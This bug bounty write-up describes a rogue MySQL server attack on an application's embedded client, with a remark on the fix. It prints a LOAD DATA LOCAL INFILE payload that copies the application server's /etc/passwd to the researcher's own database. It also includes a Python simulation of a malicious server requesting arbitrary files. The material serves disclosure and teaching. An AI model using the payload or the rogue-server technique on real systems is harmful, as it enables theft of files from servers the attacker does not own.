Client, not client!

Tung Pun
Sep 15 · 2 min read

This post describes one of my findings on a private bug bounty program. The attack vector is simple, short and elegant (at least to me).

Simplicity is the ultimate sophistication.

One day, HackerOne asked me to join a private program. OK. I decided to have a look.

After creating a test account, I was asked to fill in the data source details:

Database connection parameters are required. (The website frontend has been altered to protect the program's privacy.)

The application embeds a MySQL client and connects it to whatever MySQL server the user supplies, in this case my own. That client runs on the application server, so a LOAD DATA LOCAL INFILE statement makes it read a file from the application server's own disk and send the contents to the database server I control (this requires the client library to have local_infile enabled; on the server side it is my setting to enable). I created a user, a database and a table on my server, opened the port, and put this payload in the SQL SELECT box:

LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE dadadb.dadatable FIELDS TERMINATED BY "\n"

Then I sent the request, and the application server's /etc/passwd showed up in the table on my server:

mysql> select * from dadadb.dadatable;
+---------------------------------+
| value                           |
+---------------------------------+
| root:x:0:0:root:/root:/bin/bash |
| ...                             |
+---------------------------------+

I submitted the report and got the bounty.

The fix on the application side is to disable LOAD DATA LOCAL in the MySQL client library (every major connector exposes a switch for it; in libmysqlclient it is the MYSQL_OPT_LOCAL_INFILE option), not to filter the submitted SQL: the protocol lets a malicious server answer any query with a request for a local file, and a client with local_infile enabled will hand it over whether or not the user ever typed LOAD DATA.
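To make the exchange behind the payload concrete, here is an added Python simulation; it is not code from the original post or from the program in question. The packet framing (3-byte length, 1-byte sequence id) and the 0xFB "LOCAL INFILE request" byte follow the MySQL client/server protocol; the in-memory filesystem, the function names and the rogue server's behaviour are constructed for the example. It goes one step beyond the post in that the attacker-controlled server asks for the file no matter what query the client sent, which is what makes disabling local_infile on the client, rather than filtering SQL, the correct fix.

```python
"""
Simulation of the MySQL LOAD DATA LOCAL exchange (added example, not the
original post's code).  Packet framing and the 0xFB request byte follow the
MySQL client/server protocol; the filesystem and the rogue server's policy
are constructed here for illustration.
"""
import struct

CLIENT_LOCAL_FILES = 0x80       # capability flag a permissive client advertises at handshake
LOCAL_INFILE_REQUEST = 0xFB     # first payload byte of a server "send me this file" packet

# Constructed stand-in for the application server's filesystem.
FAKE_FS = {
    "/etc/passwd": (b"root:x:0:0:root:/root:/bin/bash\n"
                    b"www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"),
}


def build_packet(payload: bytes, seq: int) -> bytes:
    """Frame a payload as a MySQL packet: 3-byte LE length, 1-byte sequence id, payload."""
    if len(payload) > 0xFFFFFF:
        raise ValueError("payload too large for a single packet")
    return struct.pack("<I", len(payload))[:3] + bytes([seq & 0xFF]) + payload


def parse_packet(buf: bytes):
    """Split one MySQL packet into (sequence id, payload); reject truncated frames."""
    if len(buf) < 4:
        raise ValueError("truncated packet header")
    length = struct.unpack("<I", buf[:3] + b"\x00")[0]
    payload = buf[4:4 + length]
    if len(payload) != length:
        raise ValueError("truncated packet body")
    return buf[3], payload


def rogue_server_reply(client_query: bytes, wanted_file: str, seq: int = 1) -> bytes:
    """
    What an attacker-controlled server returns for ANY query: a LOCAL INFILE
    request naming a file of the server's choosing.  client_query is ignored
    on purpose; nothing in the protocol ties this reply to a LOAD DATA statement.
    """
    return build_packet(bytes([LOCAL_INFILE_REQUEST]) + wanted_file.encode(), seq)


def client_handle_reply(reply: bytes, local_infile_enabled: bool, fs=FAKE_FS):
    """
    Model of the application's MySQL client receiving the server reply and
    returning the packets it would send next.  A hardened client refuses the
    file request; a permissive one reads the file from ITS OWN filesystem and
    streams it to the server, terminated by an empty packet (end of file).
    """
    seq, payload = parse_packet(reply)
    if not payload or payload[0] != LOCAL_INFILE_REQUEST:
        return []                       # OK / ERR / result set: nothing to upload
    filename = payload[1:].decode()
    if not local_infile_enabled:
        raise PermissionError(f"server asked for {filename!r} but LOAD DATA LOCAL is disabled")
    data = fs.get(filename, b"")        # a real client still sends the terminator on a missing file
    out = []
    for i in range(0, len(data), 0xFFFFFF):     # large files span several packets
        out.append(build_packet(data[i:i + 0xFFFFFF], seq + 1 + len(out)))
    out.append(build_packet(b"", seq + 1 + len(out)))   # empty packet signals EOF
    return out


def leaked_file(packets) -> bytes:
    """Server side: reassemble the file the client just uploaded."""
    return b"".join(parse_packet(p)[1] for p in packets)


if __name__ == "__main__":
    reply = rogue_server_reply(b"SELECT 1", "/etc/passwd")   # client asked for nothing file-related
    print(leaked_file(client_handle_reply(reply, local_infile_enabled=True)).decode())
    try:
        client_handle_reply(reply, local_infile_enabled=False)
    except PermissionError as e:
        print("hardened client:", e)
```

Running it prints the constructed /etc/passwd once for the permissive client and a refusal for the hardened one; the only difference between the two outcomes is the client-side local_infile switch, since the server's reply is identical in both runs.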
